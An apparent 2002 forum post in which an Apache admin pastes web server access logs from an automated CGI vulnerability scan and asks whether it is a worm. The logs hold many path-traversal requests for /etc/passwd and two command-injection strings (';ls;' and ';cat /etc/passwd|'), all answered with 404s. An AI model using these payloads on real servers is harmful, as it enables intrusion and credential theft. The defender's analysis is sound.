Hello everybody. I run Apache/1.3.23 in Suse 8.0 box and i had these logs in my access log file I wonder if this is a new worm or just an attack in my linux box I would appreciate it if somebody helped me xxx.xxx.xxx.xxx - - [13/Aug/2002:18:18:38 +0300] "HEAD /cgi-bin/mailnews.cgi HTTP/1.0" 404 0 "-" "-" xxx.xxx.xxx.xxx - - [13/Aug/2002:18:18:39 +0300] "HEAD /cgi-bin/newsdesk.cgi HTTP/1.0" 404 0 "-" "-" xxx.xxx.xxx.xxx - - [13/Aug/2002:18:18:42 +0300] "HEAD /cgi-bin/pals-cgi HTTP/1.0" 404 0 "-" "-" xxx.xxx.xxx.xxx - - [13/Aug/2002:18:18:43 +0300] "HEAD /ROADS/ HTTP/1.0" 404 0 "-" "-" xxx.xxx.xxx.xxx - - [13/Aug/2002:18:18:43 +0300] "GET /cgi-bin/sendtemp.pl?templ=../../etc/passwd HTTP/1.0" 404 285 "-" "-" xxx.xxx.xxx.xxx - - [13/Aug/2002:18:18:44 +0300] "HEAD /way-board/ HTTP/1.0" 404 0 "-" "-" xxx.xxx.xxx.xxx - - [13/Aug/2002:18:18:44 +0300] "GET /cgi-bin/webspirs.cgi?sp.nextform=../../../../../../etc/passwd HTTP/1.0" 404 286 "-" "-" xxx.xxx.xxx.xxx - - [13/Aug/2002:18:18:44 +0300] "HEAD /cgi-bin/DCShop/Orders/orders.txt HTTP/1.0" 404 0 "-" "-" xxx.xxx.xxx.xxx - - [13/Aug/2002:18:18:45 +0300] "HEAD /cgi-bin/a1disp3.cgi?/../../../../../../etc/passwd HTTP/1.0" 404 0 "-" "-" xxx.xxx.xxx.xxx - - [13/Aug/2002:18:18:45 +0300] "HEAD /cgi-bin/a1stats/ HTTP/1.0" 404 0 "-" "-" xxx.xxx.xxx.xxx - - [13/Aug/2002:18:18:46 +0300] "GET /cgi-bin/get32.exe HTTP/1.0" 404 283 "-" "-" xxx.xxx.xxx.xxx - - [13/Aug/2002:18:18:46 +0300] "GET /cgi-bin/auktion.cgi?menue=../../../../../../../../../etc/passwd HTTP/1.0" 404 285 "-" "-" xxx.xxx.xxx.xxx - - [13/Aug/2002:18:18:50 +0300] "GET ///index.php?chemin=..%2F..%2F..%2F..%2F..%2F..%2Fetc HTTP/1.0" 404 277 "-" "-" xxx.xxx.xxx.xxx - - [13/Aug/2002:18:18:50 +0300] "GET /cgi-bin/index.php?chemin=..%2F..%2F..%2F..%2F..%2F..%2Fetc HTTP/1.0" 404 283 "-" "-" xxx.xxx.xxx.xxx - - [13/Aug/2002:18:18:50 +0300] "GET ///edit_image.php?dn=1&userfile=/etc/passwd&userfile_name=%20;ls;%20 HTTP/1.0" 404 282 "-" "-" xxx.xxx.xxx.xxx - - [13/Aug/2002:18:18:51 +0300] "GET /cgi-bin/eshop.pl?seite=;cat%20/etc/passwd| HTTP/1.0" 404 282 "-" "-" xxx.xxx.xxx.xxx - - [13/Aug/2002:18:20:35 +0300] "GET / HTTP/1.1" 200 24306 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0; T312461)" xxx.xxx.xxx.xxx - - [13/Aug/2002:18:20:37 +0300] "GET /main.css HTTP/1.1" 200 1567 "http://194.219.59.131/" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0; T312461)" xxx.xxx.xxx.xxx - - [13/Aug/2002:18:20:38 +0300] "GET /bAN-NIK.jpg HTTP/1.1" 200 28928 "http://194.219.59.131/" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0; T312461)" xxx.xxx.xxx.xxx - - [13/Aug/2002:18:20:39 +0300] "GET /site_map01-copy.jpg HTTP/1.1" 200 22412 "http://194.219.59.131/" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0; T312461)" xxx.xxx.xxx.xxx - - [13/Aug/2002:18:20:42 +0300] "GET /site_map02-copy.jpg HTTP/1.1" 200 26944 "http://194.219.59.131/" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0; T312461)" xxx.xxx.xxx.xxx - - [13/Aug/2002:18:20:43 +0300] "GET /ems2.gif HTTP/1.1" 200 3873 "http://194.219.59.131/" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0; T312461)" xxx.xxx.xxx.xxx - - [13/Aug/2002:18:20:44 +0300] "GET /images/Send_Mail.gif HTTP/1.1" 200 1119 "http://194.219.59.131/" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0; T312461)" xxx.xxx.xxx.xxx - - [13/Aug/2002:18:20:46 +0300] "GET /MAPS_SEAS/winds_gr.jpg HTTP/1.1" 200 31832 "http://194.219.59.131/" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0; T312461)" cirrus:/www/db # cat /www/db/awstats_archive.log | grep xxx.xxx.xxx.xxx xxx.xxx.xxx.xxx - - [13/Aug/2002:18:16:33 +0300] "HEAD / HTTP\1.0" 200 0 "-" "-" xxx.xxx.xxx.xxx - - [13/Aug/2002:18:16:43 +0300] "HEAD /// HTTP/1.0" 200 0 "-" "-" xxx.xxx.xxx.xxx - - [13/Aug/2002:18:16:44 +0300] "HEAD ///server-info HTTP/1.0" 404 0 "-" "-" xxx.xxx.xxx.xxx - - [13/Aug/2002:18:16:47 +0300] "HEAD ///server-status HTTP/1.0" 404 0 "-" "-" xxx.xxx.xxx.xxx - - [13/Aug/2002:18:16:51 +0300] "HEAD /site/eg/ HTTP/1.0" 404 0 "-" "-" xxx.xxx.xxx.xxx - - [13/Aug/2002:18:16:51 +0300] "HEAD /doc/ HTTP/1.0" 404 0 "-" "-" xxx.xxx.xxx.xxx - - [13/Aug/2002:18:16:51 +0300] "HEAD /~nobody/ HTTP/1.0" 404 0 "-" "-" xxx.xxx.xxx.xxx - - [13/Aug/2002:18:16:52 +0300] "HEAD ///manual/ HTTP/1.0" 404 0 "-" "-" xxx.xxx.xxx.xxx - - [13/Aug/2002:18:16:52 +0300] "HEAD /cgi-bin/ HTTP/1.0" 403 0 "-" "-" xxx.xxx.xxx.xxx - - [13/Aug/2002:18:16:53 +0300] "HEAD /cgi-bin/ad.cgi HTTP/1.0" 404 0 "-" "-" xxx.xxx.xxx.xxx - - [13/Aug/2002:18:16:53 +0300] "HEAD /cgi-bin/aglimpse HTTP/1.0" 404 0 "-" "-" xxx.xxx.xxx.xxx - - [13/Aug/2002:18:16:53 +0300] "HEAD /cgi-bin/AnyForm2 HTTP/1.0" 404 0 "-" "-" xxx.xxx.xxx.xxx - - [13/Aug/2002:18:16:54 +0300] "HEAD /cgi-bin/bbs_forum.cgi HTTP/1.0" 404 0 "-" "-" xxx.xxx.xxx.xxx - - [13/Aug/2002:18:16:54 +0300] "HEAD /cgi-bin/bsguest.cgi HTTP/1.0" 404 0 "-" "-" xxx.xxx.xxx.xxx - - [13/Aug/2002:18:16:55 +0300] "HEAD /cgi-bin/bslist.cgi HTTP/1.0" 404 0 "-" "-" xxx.xxx.xxx.xxx - - [13/Aug/2002:18:16:55 +0300] "HEAD /cgi-bin/campas HTTP/1.0" 404 0 "-" "-" xxx.xxx.xxx.xxx - - [13/Aug/2002:18:16:56 +0300] "HEAD /// HTTP/1.0" 200 0 "-" "-" xxx.xxx.xxx.xxx - - [13/Aug/2002:18:16:56 +0300] "HEAD ///carbo.ddl HTTP/1.0" 404 0 "-" "-" xxx.xxx.xxx.xxx - - [13/Aug/2002:18:16:56 +0300] "HEAD /cgi-bin/count.cgi HTTP/1.0" 404 0 "-" "-" xxx.xxx.xxx.xxx - - [13/Aug/2002:18:16:57 +0300] "HEAD /cgi-bin/cgforum.cgi HTTP/1.0" 404 0 "-" "-" xxx.xxx.xxx.xxx - - [13/Aug/2002:18:17:00 +0300] "HEAD /cgi-bin/gbook.cgi HTTP/1.0" 404 0 "-" "-" xxx.xxx.xxx.xxx - - [13/Aug/2002:18:17:00 +0300] "HEAD /cgi-bin/htsearch HTTP/1.0" 404 0 "-" "-" xxx.xxx.xxx.xxx - - [13/Aug/2002:18:17:04 +0300] "HEAD /cgi-bin/htmlscript HTTP/1.0" 404 0 "-" "-" xxx.xxx.xxx.xxx - - [13/Aug/2002:18:17:07 +0300] "HEAD /cgi-bin/jj HTTP/1.0" 404 0 "-" "-" xxx.xxx.xxx.xxx - - [13/Aug/2002:18:17:07 +0300] "HEAD /technote/ HTTP/1.0" 404 0 "-" "-" xxx.xxx.xxx.xxx - - [13/Aug/2002:18:17:08 +0300] "HEAD /cgi-bin/mmstdod.cgi HTTP/1.0" 404 0 "-" "-" xxx.xxx.xxx.xxx - - [13/Aug/2002:18:17:08 +0300] "HEAD /cgi-bin/newdesk HTTP/1.0" 404 0 "-" "-" xxx.xxx.xxx.xxx - - [13/Aug/2002:18:17:09 +0300] "HEAD /cgi-bin/register.cgi HTTP/1.0" 404 0 "-" "-" xxx.xxx.xxx.xxx - - [13/Aug/2002:18:17:13 +0300] "HEAD /cgi-bin/simplestguest.cgi HTTP/1.0" 404 0 "-" "-" xxx.xxx.xxx.xxx - - [13/Aug/2002:18:17:13 +0300] "HEAD /cgi-bin/statusconfig.pl HTTP/1.0" 404 0 "-" "-" xxx.xxx.xxx.xxx - - [13/Aug/2002:18:17:14 +0300] "HEAD /cgi-bin/webgais HTTP/1.0" 404 0 "-" "-" xxx.xxx.xxx.xxx - - [13/Aug/2002:18:17:15 +0300] "HEAD /iisadmpwd/ HTTP/1.0" 404 0 "-" "-" xxx.xxx.xxx.xxx - - [13/Aug/2002:18:17:18 +0300] "HEAD /cgi-bin/webgais HTTP/1.0" 404 0 "-" "-" xxx.xxx.xxx.xxx - - [13/Aug/2002:18:17:19 +0300] "HEAD /cgi-bin/perl.exe HTTP/1.0" 404 0 "-" "-" xxx.xxx.xxx.xxx - - [13/Aug/2002:18:17:19 +0300] "HEAD /cgi-dos/ HTTP/1.0" 404 0 "-" "-" xxx.xxx.xxx.xxx - - [13/Aug/2002:18:17:20 +0300] "HEAD /scripts/ HTTP/1.0" 404 0 "-" "-" xxx.xxx.xxx.xxx - - [13/Aug/2002:18:17:20 +0300] "HEAD /cgi-bin/infosrch.cgi HTTP/1.0" 404 0 "-" "-" xxx.xxx.xxx.xxx - - [13/Aug/2002:18:17:21 +0300] "HEAD /cgi-bin/rguest.exe HTTP/1.0" 404 0 "-" "-" xxx.xxx.xxx.xxx - - [13/Aug/2002:18:17:22 +0300] "HEAD /mall_log_files/ HTTP/1.0" 404 0 "-" "-" xxx.xxx.xxx.xxx - - [13/Aug/2002:18:17:22 +0300] "HEAD /cgi-bin/ezshopper2/loadpage.cgi HTTP/1.0" 404 0 "-" "-" xxx.xxx.xxx.xxx - - [13/Aug/2002:18:17:23 +0300] "HEAD /Admin_files/ HTTP/1.0" 404 0 "-" "-" xxx.xxx.xxx.xxx - - [13/Aug/2002:18:17:23 +0300] "GET ///quote.html HTTP/1.0" 404 278 "-" "-" xxx.xxx.xxx.xxx - - [13/Aug/2002:18:17:24 +0300] "GET /cgi-bin/cal_make.pl?p0=../../../../../../../../../../../../etc/passwd%00 HTTP/1.0" 404 285 "-" "-" xxx.xxx.xxx.xxx - - [13/Aug/2002:18:17:24 +0300] "HEAD /cgi-bin/dcboard.cgi HTTP/1.0" 404 0 "-" "-" xxx.xxx.xxx.xxx - - [13/Aug/2002:18:17:25 +0300] "GET /cgi-bin/nph-maillist.pl HTTP/1.0" 404 289 "-" "-" xxx.xxx.xxx.xxx - - [13/Aug/2002:18:17:25 +0300] "GET /cgi-bin/talkback.cgi?article=../../../../../../../../etc/passwd%00&action=view&matchview=1 HTTP/1.0" 404 286 "-" "-" xxx.xxx.xxx.xxx - - [13/Aug/2002:18:17:26 +0300] "GET /cgi-bin/ustorekeeper.pl?command=goto&file=../../../../../../../../../../etc/passwd HTTP/1.0" 404 289 "-" "-" xxx.xxx.xxx.xxx - - [13/Aug/2002:18:17:26 +0300] "HEAD /cgi-bin/ikonboard/ HTTP/1.0" 404 0 "-" "-" xxx.xxx.xxx.xxx - - [13/Aug/2002:18:17:26 +0300] "HEAD /foldoc/ HTTP/1.0" 404 0 "-" "-" xxx.xxx.xxx.xxx - - [13/Aug/2002:18:17:27 +0300] "HEAD /cgi-bin/adcycle/ HTTP/1.0" 404 0 "-" "-" xxx.xxx.xxx.xxx - - [13/Aug/2002:18:17:27 +0300] "GET /cgi-bin/store.cgi?StartID=../etc/passwd%00.html HTTP/1.0" 404 283 "-" "-" xxx.xxx.xxx.xxx - - [13/Aug/2002:18:17:28 +0300] "HEAD /cgi-bin/bbs_forum.cgi HTTP/1.0" 404 0 "-" "-" xxx.xxx.xxx.xxx - - [13/Aug/2002:18:17:28 +0300] "HEAD /cgi-bin/commerce.cgi?page=../../../../etc/hosts%00index.html HTTP/1.0" 404 0 "-" "-" xxx.xxx.xxx.xxx - - [13/Aug/2002:18:17:28 +0300] "GET /cgi-bin/auktion.pl?menue=../../../../../../../../../../../../../etc/passwd HTTP/1.0" 404 284 "-" "-" xxx.xxx.xxx.xxx - - [13/Aug/2002:18:17:32 +0300] "GET /cgi-bin/hsx.cgi?show=../../../../../../etc/passwd%00 HTTP/1.0" 404 281 "-" "-" xxx.xxx.xxx.xxx - - [13/Aug/2002:18:17:32 +0300] "HEAD /cgi-bin/mailnews.cgi HTTP/1.0" 404 0 "-" "-" xxx.xxx.xxx.xxx - - [13/Aug/2002:18:17:33 +0300] "HEAD /cgi-bin/newsdesk.cgi HTTP/1.0" 404 0 "-" "-" xxx.xxx.xxx.xxx - - [13/Aug/2002:18:17:33 +0300] "HEAD /cgi-bin/pals-cgi HTTP/1.0" 404 0 "-" "-" xxx.xxx.xxx.xxx - - [13/Aug/2002:18:17:34 +0300] "HEAD /ROADS/ HTTP/1.0" 404 0 "-" "-" xxx.xxx.xxx.xxx - - [13/Aug/2002:18:17:34 +0300] "GET /cgi-bin/sendtemp.pl?templ=../../etc/passwd HTTP/1.0" 404 285 "-" "-" xxx.xxx.xxx.xxx - - [13/Aug/2002:18:17:34 +0300] "HEAD /way-board/ HTTP/1.0" 404 0 "-" "-" xxx.xxx.xxx.xxx - - [13/Aug/2002:18:17:35 +0300] "GET /cgi-bin/webspirs.cgi?sp.nextform=../../../../../../etc/passwd HTTP/1.0" 404 286 "-" "-" xxx.xxx.xxx.xxx - - [13/Aug/2002:18:17:35 +0300] "HEAD /cgi-bin/DCShop/Orders/orders.txt HTTP/1.0" 404 0 "-" "-" xxx.xxx.xxx.xxx - - [13/Aug/2002:18:17:36 +0300] "HEAD /cgi-bin/a1disp3.cgi?/../../../../../../etc/passwd HTTP/1.0" 404 0 "-" "-" xxx.xxx.xxx.xxx - - [13/Aug/2002:18:17:37 +0300] "HEAD /cgi-bin/a1stats/ HTTP/1.0" 404 0 "-" "-" xxx.xxx.xxx.xxx - - [13/Aug/2002:18:17:37 +0300] "GET /cgi-bin/get32.exe HTTP/1.0" 404 283 "-" "-" xxx.xxx.xxx.xxx - - [13/Aug/2002:18:17:38 +0300] "GET /cgi-bin/auktion.cgi?menue=../../../../../../../../../etc/passwd HTTP/1.0" 404 285 "-" "-" xxx.xxx.xxx.xxx - - [13/Aug/2002:18:17:38 +0300] "GET ///index.php?chemin=..%2F..%2F..%2F..%2F..%2F..%2Fetc HTTP/1.0" 404 277 "-" "-" xxx.xxx.xxx.xxx - - [13/Aug/2002:18:17:42 +0300] "GET /cgi-bin/index.php?chemin=..%2F..%2F..%2F..%2F..%2F..%2Fetc HTTP/1.0" 404 283 "-" "-" xxx.xxx.xxx.xxx - - [13/Aug/2002:18:17:42 +0300] "GET ///edit_image.php?dn=1&userfile=/etc/passwd&userfile_name=%20;ls;%20 HTTP/1.0" 404 282 "-" "-" xxx.xxx.xxx.xxx - - [13/Aug/2002:18:17:42 +0300] "GET /cgi-bin/eshop.pl?seite=;cat%20/etc/passwd| HTTP/1.0" 404 282 "-" "-" xxx.xxx.xxx.xxx - - [13/Aug/2002:18:17:49 +0300] "HEAD / HTTP\1.0" 200 0 "-" "-" xxx.xxx.xxx.xxx - - [13/Aug/2002:18:18:02 +0300] "HEAD /// HTTP/1.0" 200 0 "-" "-" xxx.xxx.xxx.xxx - - [13/Aug/2002:18:18:03 +0300] "HEAD ///server-info HTTP/1.0" 404 0 "-" "-" xxx.xxx.xxx.xxx - - [13/Aug/2002:18:18:03 +0300] "HEAD ///server-status HTTP/1.0" 404 0 "-" "-" xxx.xxx.xxx.xxx - - [13/Aug/2002:18:18:04 +0300] "HEAD /site/eg/ HTTP/1.0" 404 0 "-" "-" xxx.xxx.xxx.xxx - - [13/Aug/2002:18:18:07 +0300] "HEAD /doc/ HTTP/1.0" 404 0 "-" "-" xxx.xxx.xxx.xxx - - [13/Aug/2002:18:18:07 +0300] "HEAD /~nobody/ HTTP/1.0" 404 0 "-" "-" xxx.xxx.xxx.xxx - - [13/Aug/2002:18:18:11 +0300] "HEAD ///manual/ HTTP/1.0" 404 0 "-" "-" xxx.xxx.xxx.xxx - - [13/Aug/2002:18:18:11 +0300] "HEAD /cgi-bin/ HTTP/1.0" 403 0 "-" "-" xxx.xxx.xxx.xxx - - [13/Aug/2002:18:18:12 +0300] "HEAD /cgi-bin/ad.cgi HTTP/1.0" 404 0 "-" "-" xxx.xxx.xxx.xxx - - [13/Aug/2002:18:18:12 +0300] "HEAD /cgi-bin/aglimpse HTTP/1.0" 404 0 "-" "-" xxx.xxx.xxx.xxx - - [13/Aug/2002:18:18:13 +0300] "HEAD /cgi-bin/AnyForm2 HTTP/1.0" 404 0 "-" "-" xxx.xxx.xxx.xxx - - [13/Aug/2002:18:18:13 +0300] "HEAD /cgi-bin/bbs_forum.cgi HTTP/1.0" 404 0 "-" "-" xxx.xxx.xxx.xxx - - [13/Aug/2002:18:18:14 +0300] "HEAD /cgi-bin/bsguest.cgi HTTP/1.0" 404 0 "-" "-" xxx.xxx.xxx.xxx - - [13/Aug/2002:18:18:14 +0300] "HEAD /cgi-bin/bslist.cgi HTTP/1.0" 404 0 "-" "-" xxx.xxx.xxx.xxx - - [13/Aug/2002:18:18:14 +0300] "HEAD /cgi-bin/campas HTTP/1.0" 404 0 "-" "-" xxx.xxx.xxx.xxx - - [13/Aug/2002:18:18:15 +0300] "HEAD /// HTTP/1.0" 200 0 "-" "-" xxx.xxx.xxx.xxx - - [13/Aug/2002:18:18:15 +0300] "HEAD ///carbo.ddl HTTP/1.0" 404 0 "-" "-" xxx.xxx.xxx.xxx - - [13/Aug/2002:18:18:16 +0300] "HEAD /cgi-bin/count.cgi HTTP/1.0" 404 0 "-" "-" xxx.xxx.xxx.xxx - - [13/Aug/2002:18:18:19 +0300] "HEAD /cgi-bin/cgforum.cgi HTTP/1.0" 404 0 "-" "-" xxx.xxx.xxx.xxx - - [13/Aug/2002:18:18:20 +0300] "HEAD /cgi-bin/faxsurvey HTTP/1.0" 404 0 "-" "-" xxx.xxx.xxx.xxx - - [13/Aug/2002:18:18:20 +0300] "HEAD /cgi-bin/gbook.cgi HTTP/1.0" 404 0 "-" "-" xxx.xxx.xxx.xxx - - [13/Aug/2002:18:18:21 +0300] "HEAD /cgi-bin/htsearch HTTP/1.0" 404 0 "-" "-" xxx.xxx.xxx.xxx - - [13/Aug/2002:18:18:21 +0300] "HEAD /cgi-bin/htmlscript HTTP/1.0" 404 0 "-" "-" xxx.xxx.xxx.xxx - - [13/Aug/2002:18:18:21 +0300] "HEAD /cgi-bin/jj HTTP/1.0" 404 0 "-" "-" xxx.xxx.xxx.xxx - - [13/Aug/2002:18:18:22 +0300] "HEAD /technote/ HTTP/1.0" 404 0 "-" "-" xxx.xxx.xxx.xxx - - [13/Aug/2002:18:18:22 +0300] "HEAD /cgi-bin/mmstdod.cgi HTTP/1.0" 404 0 "-" "-" xxx.xxx.xxx.xxx - - [13/Aug/2002:18:18:23 +0300] "HEAD /cgi-bin/newdesk HTTP/1.0" 404 0 "-" "-" xxx.xxx.xxx.xxx - - [13/Aug/2002:18:18:23 +0300] "HEAD /cgi-bin/register.cgi HTTP/1.0" 404 0 "-" "-" xxx.xxx.xxx.xxx - - [13/Aug/2002:18:18:23 +0300] "HEAD /cgi-bin/simplestguest.cgi HTTP/1.0" 404 0 "-" "-" xxx.xxx.xxx.xxx - - [13/Aug/2002:18:18:24 +0300] "HEAD /cgi-bin/statusconfig.pl HTTP/1.0" 404 0 "-" "-" xxx.xxx.xxx.xxx - - [13/Aug/2002:18:18:24 +0300] "HEAD /cgi-bin/webgais HTTP/1.0" 404 0 "-" "-" xxx.xxx.xxx.xxx - - [13/Aug/2002:18:18:25 +0300] "HEAD /iisadmpwd/ HTTP/1.0" 404 0 "-" "-" xxx.xxx.xxx.xxx - - [13/Aug/2002:18:18:25 +0300] "HEAD /cgi-bin/webgais HTTP/1.0" 404 0 "-" "-" xxx.xxx.xxx.xxx - - [13/Aug/2002:18:18:28 +0300] "HEAD /cgi-bin/perl.exe HTTP/1.0" 404 0 "-" "-" xxx.xxx.xxx.xxx - - [13/Aug/2002:18:18:29 +0300] "HEAD /cgi-dos/ HTTP/1.0" 404 0 "-" "-" xxx.xxx.xxx.xxx - - [13/Aug/2002:18:18:29 +0300] "HEAD /scripts/ HTTP/1.0" 404 0 "-" "-" xxx.xxx.xxx.xxx - - [13/Aug/2002:18:18:30 +0300] "HEAD /cgi-bin/infosrch.cgi HTTP/1.0" 404 0 "-" "-" xxx.xxx.xxx.xxx - - [13/Aug/2002:18:18:30 +0300] "HEAD /cgi-bin/rguest.exe HTTP/1.0" 404 0 "-" "-" xxx.xxx.xxx.xxx - - [13/Aug/2002:18:18:30 +0300] "HEAD /mall_log_files/ HTTP/1.0" 404 0 "-" "-" xxx.xxx.xxx.xxx - - [13/Aug/2002:18:18:31 +0300] "HEAD /cgi-bin/ezshopper2/loadpage.cgi HTTP/1.0" 404 0 "-" "-" xxx.xxx.xxx.xxx - - [13/Aug/2002:18:18:31 +0300] "HEAD /Admin_files/ HTTP/1.0" 404 0 "-" "-" xxx.xxx.xxx.xxx - - [13/Aug/2002:18:18:32 +0300] "GET ///quote.html HTTP/1.0" 404 278 "-" "-" xxx.xxx.xxx.xxx - - [13/Aug/2002:18:18:32 +0300] "GET /cgi-bin/cal_make.pl?p0=../../../../../../../../../../../../etc/passwd%00 HTTP/1.0" 404 285 "-" "-" xxx.xxx.xxx.xxx - - [13/Aug/2002:18:18:33 +0300] "HEAD /cgi-bin/dcboard.cgi HTTP/1.0" 404 0 "-" "-" xxx.xxx.xxx.xxx - - [13/Aug/2002:18:18:33 +0300] "GET /cgi-bin/nph-maillist.pl HTTP/1.0" 404 289 "-" "-" xxx.xxx.xxx.xxx - - [13/Aug/2002:18:18:33 +0300] "GET /cgi-bin/talkback.cgi?article=../../../../../../../../etc/passwd%00&action=view&matchview=1 HTTP/1.0" 404 286 "-" "-" xxx.xxx.xxx.xxx - - [13/Aug/2002:18:18:34 +0300] "GET /cgi-bin/ustorekeeper.pl?command=goto&file=../../../../../../../../../../etc/passwd HTTP/1.0" 404 289 "-" "-" xxx.xxx.xxx.xxx - - [13/Aug/2002:18:18:34 +0300] "HEAD /cgi-bin/ikonboard/ HTTP/1.0" 404 0 "-" "-" xxx.xxx.xxx.xxx - - [13/Aug/2002:18:18:35 +0300] "HEAD /foldoc/ HTTP/1.0" 404 0 "-" "-" xxx.xxx.xxx.xxx - - [13/Aug/2002:18:18:35 +0300] "HEAD /cgi-bin/adcycle/ HTTP/1.0" 404 0 "-" "-" xxx.xxx.xxx.xxx - - [13/Aug/2002:18:18:35 +0300] "GET /cgi-bin/store.cgi?StartID=../etc/passwd%00.html HTTP/1.0" 404 283 "-" "-" xxx.xxx.xxx.xxx - - [13/Aug/2002:18:18:36 +0300] "HEAD /cgi-bin/bbs_forum.cgi HTTP/1.0" 404 0 "-" "-" xxx.xxx.xxx.xxx - - [13/Aug/2002:18:18:36 +0300] "HEAD /cgi-bin/commerce.cgi?page=../../../../etc/hosts%00index.html HTTP/1.0" 404 0 "-" "-" xxx.xxx.xxx.xxx - - [13/Aug/2002:18:18:37 +0300] "GET /cgi-bin/auktion.pl?menue=../../../../../../../../../../../../../etc/passwd HTTP/1.0" 404 284 "-" "-" xxx.xxx.xxx.xxx - - [13/Aug/2002:18:18:37 +0300] "GET /cgi-bin/hsx.cgi?show=../../../../../../etc/passwd%00 HTTP/1.0" 404 281 "-" "-" xxx.xxx.xxx.xxx - - [13/Aug/2002:18:18:38 +0300] "HEAD /cgi-bin/mailnews.cgi HTTP/1.0" 404 0 "-" "-" xxx.xxx.xxx.xxx - - [13/Aug/2002:18:18:39 +0300] "HEAD /cgi-bin/newsdesk.cgi HTTP/1.0" 404 0 "-" "-" xxx.xxx.xxx.xxx - - [13/Aug/2002:18:18:42 +0300] "HEAD /cgi-bin/pals-cgi HTTP/1.0" 404 0 "-" "-" xxx.xxx.xxx.xxx - - [13/Aug/2002:18:18:43 +0300] "HEAD /ROADS/ HTTP/1.0" 404 0 "-" "-" xxx.xxx.xxx.xxx - - [13/Aug/2002:18:18:43 +0300] "GET /cgi-bin/sendtemp.pl?templ=../../etc/passwd HTTP/1.0" 404 285 "-" "-" xxx.xxx.xxx.xxx - - [13/Aug/2002:18:18:44 +0300] "HEAD /way-board/ HTTP/1.0" 404 0 "-" "-" xxx.xxx.xxx.xxx - - [13/Aug/2002:18:18:44 +0300] "GET /cgi-bin/webspirs.cgi?sp.nextform=../../../../../../etc/passwd HTTP/1.0" 404 286 "-" "-" xxx.xxx.xxx.xxx - - [13/Aug/2002:18:18:44 +0300] "HEAD /cgi-bin/DCShop/Orders/orders.txt HTTP/1.0" 404 0 "-" "-" xxx.xxx.xxx.xxx - - [13/Aug/2002:18:18:45 +0300] "HEAD /cgi-bin/a1disp3.cgi?/../../../../../../etc/passwd HTTP/1.0" 404 0 "-" "-" xxx.xxx.xxx.xxx - - [13/Aug/2002:18:18:45 +0300] "HEAD /cgi-bin/a1stats/ HTTP/1.0" 404 0 "-" "-" xxx.xxx.xxx.xxx - - [13/Aug/2002:18:18:46 +0300] "GET /cgi-bin/get32.exe HTTP/1.0" 404 283 "-" "-" xxx.xxx.xxx.xxx - - [13/Aug/2002:18:18:46 +0300] "GET /cgi-bin/auktion.cgi?menue=../../../../../../../../../etc/passwd HTTP/1.0" 404 285 "-" "-" xxx.xxx.xxx.xxx - - [13/Aug/2002:18:18:50 +0300] "GET ///index.php?chemin=..%2F..%2F..%2F..%2F..%2F..%2Fetc HTTP/1.0" 404 277 "-" "-" xxx.xxx.xxx.xxx - - [13/Aug/2002:18:18:50 +0300] "GET /cgi-bin/index.php?chemin=..%2F..%2F..%2F..%2F..%2F..%2Fetc HTTP/1.0" 404 283 "-" "-" xxx.xxx.xxx.xxx - - [13/Aug/2002:18:18:50 +0300] "GET ///edit_image.php?dn=1&userfile=/etc/passwd&userfile_name=%20;ls;%20 HTTP/1.0" 404 282 "-" "-" xxx.xxx.xxx.xxx - - [13/Aug/2002:18:18:51 +0300] "GET /cgi-bin/eshop.pl?seite=;cat%20/etc/passwd| HTTP/1.0" 404 282 "-" "-" xxx.xxx.xxx.xxx - - [13/Aug/2002:18:20:35 +0300] "GET / HTTP/1.1" 200 24306 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0; T312461)" xxx.xxx.xxx.xxx - - [13/Aug/2002:18:20:37 +0300] "GET /main.css HTTP/1.1" 200 1567 "http://194.219.59.131/" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0; T312461)" xxx.xxx.xxx.xxx - - [13/Aug/2002:18:20:38 +0300] "GET /bAN-NIK.jpg HTTP/1.1" 200 28928 "http://194.219.59.131/" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0; T312461)" xxx.xxx.xxx.xxx - - [13/Aug/2002:18:20:39 +0300] "GET /site_map01-copy.jpg HTTP/1.1" 200 22412 "http://194.219.59.131/" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0; T312461)" xxx.xxx.xxx.xxx - - [13/Aug/2002:18:20:42 +0300] "GET /site_map02-copy.jpg HTTP/1.1" 200 26944 "http://194.219.59.131/" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0; T312461)" xxx.xxx.xxx.xxx - - [13/Aug/2002:18:20:43 +0300] "GET /ems2.gif HTTP/1.1" 200 3873 "http://194.219.59.131/" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0; T312461)" xxx.xxx.xxx.xxx - - [13/Aug/2002:18:20:44 +0300] "GET /images/Send_Mail.gif HTTP/1.1" 200 1119 "http://194.219.59.131/" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0; T312461)" xxx.xxx.xxx.xxx - - [13/Aug/2002:18:20:46 +0300] "GET /MAPS_SEAS/winds_gr.jpg HTTP/1.1" 200 31832 "http://194.219.59.131/" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0; T312461)"